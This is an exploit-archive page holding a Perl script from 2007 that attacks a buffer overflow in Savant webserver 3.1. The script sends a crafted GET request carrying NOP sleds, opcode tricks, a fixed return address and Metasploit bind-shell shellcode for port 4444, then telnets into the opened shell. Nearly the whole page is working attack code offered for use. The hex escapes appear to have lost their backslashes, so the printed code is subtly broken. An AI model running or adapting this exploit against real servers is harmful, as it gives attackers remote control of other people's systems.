Home / exploitsPDF  

savant-overflow.txt

Posted on 14 August 2007

#!/usr/bin/perl -w
# exploit for Savant webserver 3.1 remote bof
# shellcode bind 4444 port on target host
#
#
# Jacopo cervini aka acaro@jervus.it
#
use IO::Socket;

if(!($ARGV[1]))
{
print "Uso: savant-3.1.pl <victim> <port>

";
exit;
}





$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";

#Metasploit shellcode

$shellcode =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb5".
"x55x45xd4x83xebxfcxe2xf4x49x3fxaex99x5dxacxbax2b".
"x4ax35xcexb8x91x71xcex91x89xdex39xd1xcdx54xaax5f".
"xfax4dxcex8bx95x54xaex9dx3ex61xcexd5x5bx64x85x4d".
"x19xd1x85xa0xb2x94x8fxd9xb4x97xaex20x8ex01x61xfc".
"xc0xb0xcex8bx91x54xaexb2x3ex59x0ex5fxeax49x44x3f".
"xb6x79xcex5dxd9x71x59xb5x76x64x9exb0x3ex16x75x5f".
"xf5x59xcexa4xa9xf8xcex94xbdx0bx2dx5axfbx5bxa9x84".
"x4ax83x23x87xd3x3dx76xe6xddx22x36xe6xeax01xbax04".
"xddx9exa8x28x8ex05xbax02xeaxdcxa0xb2x34xb8x4dxd6".
"xe0x3fx47x2bx65x3dx9cxddx40xf8x12x2bx63x06x16x87".
"xe6x06x06x87xf6x06xbax04xd3x3dx54x88xd3x06xccx35".
"x20x3dxe1xcexc5x92x12x2bx63x3fx55x85xe0xaax95xbc".
"x11xf8x6bx3dxe2xaax93x87xe0xaax95xbcx50x1cxc3x9d".
"xe2xaax93x84xe1x01x10x2bx65xc6x2dx33xccx93x3cx83".
"x4ax83x10x2bx65x33x2fxb0xd3x3dx26xb9x3cxb0x2fx84".
"xecx7cx89x5dx52x3fx01x5dx57x64x85x27x1fxabx07xf9".
"x4bx17x69x47x38x2fx7dx7fx1exfex2dxa6x4bxe6x53x2b".
"xc0x11xbax02xeex02x17x85xe4x04x2fxd5xe4x04x10x85".
"x4ax85x2dx79x6cx50x8bx87x4ax83x2fx2bx4ax62xbax04".
"x3ex02xb9x57x71x31xbax02xe7xaax95xbcx45xdfx41x8b".
"xe6xaax93x2bx65x55x45xd4";





$nop="x90"x201;
$incbh="xfexc7"x4;			# inc bh opcode
$incebx="x43"x23;			# inc ebx opcode
$asm1 = "x53xc3";			# push ebx,ret opcode
$nop1="x90"x19;
$asm = "x83xc4x8cx54xc3";		# add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are 						# some opcode not allowed and we have need of space for our shellcode
$nop2="x90"x210;


$eip = "x74x86x41";			# 0x00418674 memory address of pop eax, ret in Savant.exe it's universal

$exploit = $asm.  " /". $nop.$incbh.$incebx .$asm1.$nop1. $eip ."

" .$nop2.$shellcode;

print $victim $exploit;

print " + Malicious GET request sent ...
";


print "Done.
";


close($victim);

$host = $ARGV[0];
print " + connect to 4444 of $host ...
";
sleep(3);
system("telnet $host 4444");

exit;

 

TOP

Malware :

Exploits :